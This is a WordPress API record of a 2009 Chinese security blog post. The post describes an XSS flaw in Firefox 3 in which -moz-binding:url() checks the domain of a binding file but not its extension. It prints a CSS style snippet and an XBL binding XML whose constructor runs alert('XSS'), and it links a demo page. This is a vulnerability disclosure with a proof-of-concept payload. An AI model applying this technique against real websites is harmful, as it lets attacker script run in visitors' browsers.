{"id":154,"date":"2009-06-26T15:56:58","date_gmt":"2009-06-26T15:56:58","guid":{"rendered":""},"modified":"2011-04-25T08:37:43","modified_gmt":"2011-04-25T08:37:43","slug":"ff3%e7%9a%84%e3%80%8amoz-binding-url%e3%80%8b%e6%9c%aa%e9%99%90%e5%88%b6%e6%96%87%e4%bb%b6%e6%89%a9%e5%b1%95%e5%90%8d%e5%af%bc%e8%87%b4xss%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"https:\/\/www.inbreak.net\/archives\/154.html","title":{"rendered":"FF3\u7684\u300amoz-binding: url\u300b\u672a\u9650\u5236\u6587\u4ef6\u6269\u5c55\u540d\u5bfc\u81f4XSS\u6f0f\u6d1e"},"content":{"rendered":"<p><span lang=\"EN-US\">kxlzx\uff1a\u56e0\u4e3a\u5728<a href=\"http:\/\/hi.baidu.com\/hi_heige\/\">http:\/\/hi.baidu.com\/hi_heige\/<\/a>\u7684\u7559\u8a00\u88ab\u767e\u5ea6\u5220\u9664\u4e86\uff0c\u53ea\u597d\u5728\u8fd9\u91cc\u53d1\u7bc7\u3002<\/span><\/p>\n<p><strong>\u6458\u8981\uff1a<\/strong><\/p>\n<p><span lang=\"EN-US\">\u5728<a href=\"http:\/\/www.80vul.com\/qqmail\/QQmail%20Multiple%20Xss%20Vulnerabilities.htm\">http:\/\/www.80vul.com\/qqmail\/QQmail%20Multiple%20Xss%20Vulnerabilities.htm<\/a><\/span><\/p>\n<p><span lang=\"EN-US\">\u770b\u5230\uff0cFF3\u5bf9<\/span><\/p>\n<p><span lang=\"EN-US\">&lt;<span class=\"GramE\">style&gt;<\/span>BODY{-<span class=\"SpellE\">moz-binding:url<\/span>(&quot;http:\/\/www.80vul.coom\/test.xml#xss&quot;)}&lt;\/style&gt;<\/span><\/p>\n<p><span lang=\"EN-US\">url\u4e2d\u7684\u57df\uff0c\u662f\u6709\u9650\u5236\u7684\u3002<\/span><\/p>\n<p><span lang=\"EN-US\">\u5982\u679c\u914d\u5408\u4e00\u4e9bweb\u5e94\u7528\u7684\u529f\u80fd\uff0c\u53ef\u4ee5\u7ed5\u8fc7\u8fd9\u4e2a\u9650\u5236\u3002<\/span><\/p>\n<p><span lang=\"EN-US\"><strong>\u8be6\u7ec6\u63cf\u8ff0\uff1a<\/strong><\/span><\/p>\n<p><span lang=\"EN-US\">FF3\u4e0d\u5141\u8bb8\u8fdc\u7a0b\u5f15\u7528\u300a{-<span class=\"SpellE\">moz-binding:url(&quot;\u8fd9\u91cc&quot;)<\/span>\u300bXML\u6587\u4ef6\u3002<\/span><\/p>\n<p><span lang=\"EN-US\"><a href=\"\/wp-content\/uploads\/date_200906\/5499ebaa37eb7446bf3d9ad433b1b939.jpg\" target=\"_blank\"><img decoding=\"async\" src=\"\/wp-content\/uploads\/date_200906\/5499ebaa37eb7446bf3d9ad433b1b939.jpg\" alt=\"a.jpg\"  class=\"alignnone size-full wp-image-154\" \/><\/a><\/span><\/p>\n<p><span lang=\"EN-US\">\u4f46\u662f\u5374\u6ca1\u6709\u5bf9\u8fd9\u91cc\u7684\u6587\u4ef6\u6269\u5c55\u540d\u505a\u9650\u5236\u3002<\/span><\/p>\n<p><span lang=\"EN-US\">\u53ea\u8981\u6211\u4eec\u53ef\u4ee5\u5728web\u5e94\u7528\u7a0b\u5e8f\u6240\u5728\u57df\u4e0a\u4f20\u6587\u4ef6\u3002<\/span><\/p>\n<p><span lang=\"EN-US\">\u5185\u5bb9\u4e3a\uff1a<\/span>\u5c31\u53ef\u4ee5\u6267\u884cXSS\u5185\u5bb9\u3002<\/p>\n<div class=\"codeText\">\n<div class=\"codeHead\">XML\/HTML\u4ee3\u7801<\/div>\n<ol class=\"dp-xml\">\n<li class=\"alt\"><span><span class=\"tag\">&lt;?<\/span><span class=\"tag-name\">xml<\/span><span>&nbsp;<\/span><span class=\"attribute\">version<\/span><span>=<\/span><span class=\"attribute-value\">&quot;1.0&quot;<\/span><span class=\"tag\">?&gt;<\/span><span class=\"tag\">&lt;<\/span><span class=\"tag-name\">bindings<\/span><span>&nbsp;<\/span><span class=\"attribute\">xmlns<\/span><span>=<\/span><span class=\"attribute-value\">&quot;http:\/\/www.mozilla.org\/xbl&quot;<\/span><span class=\"tag\">&gt;<\/span><span class=\"tag\">&lt;<\/span><span class=\"tag-name\">binding<\/span><span>&nbsp;<\/span><span class=\"attribute\">id<\/span><span>=<\/span><span class=\"attribute-value\">&quot;xss&quot;<\/span><span class=\"tag\">&gt;<\/span><span class=\"tag\">&lt;<\/span><span class=\"tag-name\">implementation<\/span><span class=\"tag\">&gt;<\/span><span class=\"tag\">&lt;<\/span><span class=\"tag-name\">constructor<\/span><span class=\"tag\">&gt;<\/span><span class=\"cdata\">&lt;![CDATA[alert(&#8216;XSS&#8217;)]]&gt;<\/span><span class=\"tag\">&lt;\/<\/span><span class=\"tag-name\">constructor<\/span><span class=\"tag\">&gt;<\/span><span>&nbsp;&nbsp;<\/span><\/span><\/li>\n<\/ol>\n<\/div>\n<p>&nbsp;<\/p>\n<p><a href=\"\/wp-content\/uploads\/date_200906\/9b3a267e2ed686692c0121c478a7c9dd.jpg\" target=\"_blank\"><img decoding=\"async\" src=\"\/wp-content\/uploads\/date_200906\/9b3a267e2ed686692c0121c478a7c9dd.jpg\" alt=\"b.jpg\"  class=\"alignnone size-full wp-image-154\" \/><\/a><\/p>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<p><a href=\"http:\/\/inbreak.net\/kxlzxtest\/ff3\/a.htm\">http:\/\/inbreak.net\/kxlzxtest\/ff3\/a.htm<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span lang=\"EN-US\">kxlzx\uff1a\u56e0\u4e3a\u5728<a href=\"http:\/\/hi.baidu.com\/hi_heige\/\">http:\/\/hi.baidu.com\/hi_heige\/<\/a>\u7684\u7559\u8a00\u88ab\u767e\u5ea6\u5220\u9664\u4e86\uff0c\u53ea\u597d\u5728\u8fd9\u91cc\u53d1\u7bc7\u3002<\/span><\/p>\n<p><span lang=\"EN-US\">\u5728<a href=\"http:\/\/www.80vul.com\/qqmail\/QQmail%20Multiple%20Xss%20Vulnerabilities.htm\">http:\/\/www.80vul.com\/qqmail\/QQmail%20Multiple%20Xss%20Vulnerabilities.htm<\/a><\/span><\/p>\n<p><span lang=\"EN-US\">\u770b\u5230\uff0cFF3\u5bf9<\/span><\/p>\n<p><span lang=\"EN-US\">&lt;<span class=\"GramE\">style&gt;<\/span>BODY{-<span class=\"SpellE\">moz-binding:url<\/span>(&quot;http:\/\/www.80vul.coom\/test.xml#xss&quot;)}&lt;\/style&gt;<\/span><\/p>\n<p><span lang=\"EN-US\">url\u4e2d\u7684\u57df\uff0c\u662f\u6709\u9650\u5236\u7684\u3002<\/span><\/p>\n<p><span lang=\"EN-US\">\u5982\u679c\u914d\u5408\u4e00\u4e9bweb\u5e94\u7528\u7684\u529f\u80fd\uff0c\u53ef\u4ee5\u7ed5\u8fc7\u8fd9\u4e2a\u9650\u5236\u3002<\/span><\/p>\n<p class=\"read-more\"><a href=\"https:\/\/www.inbreak.net\/archives\/154.html\">\u7ee7\u7eed\u9605\u8bfb &raquo;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[86,5],"tags":[50,51,21],"views":5373,"_links":{"self":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/154"}],"collection":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/comments?post=154"}],"version-history":[{"count":1,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/154\/revisions"}],"predecessor-version":[{"id":226,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/154\/revisions\/226"}],"wp:attachment":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/media?parent=154"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/categories?post=154"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/tags?post=154"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}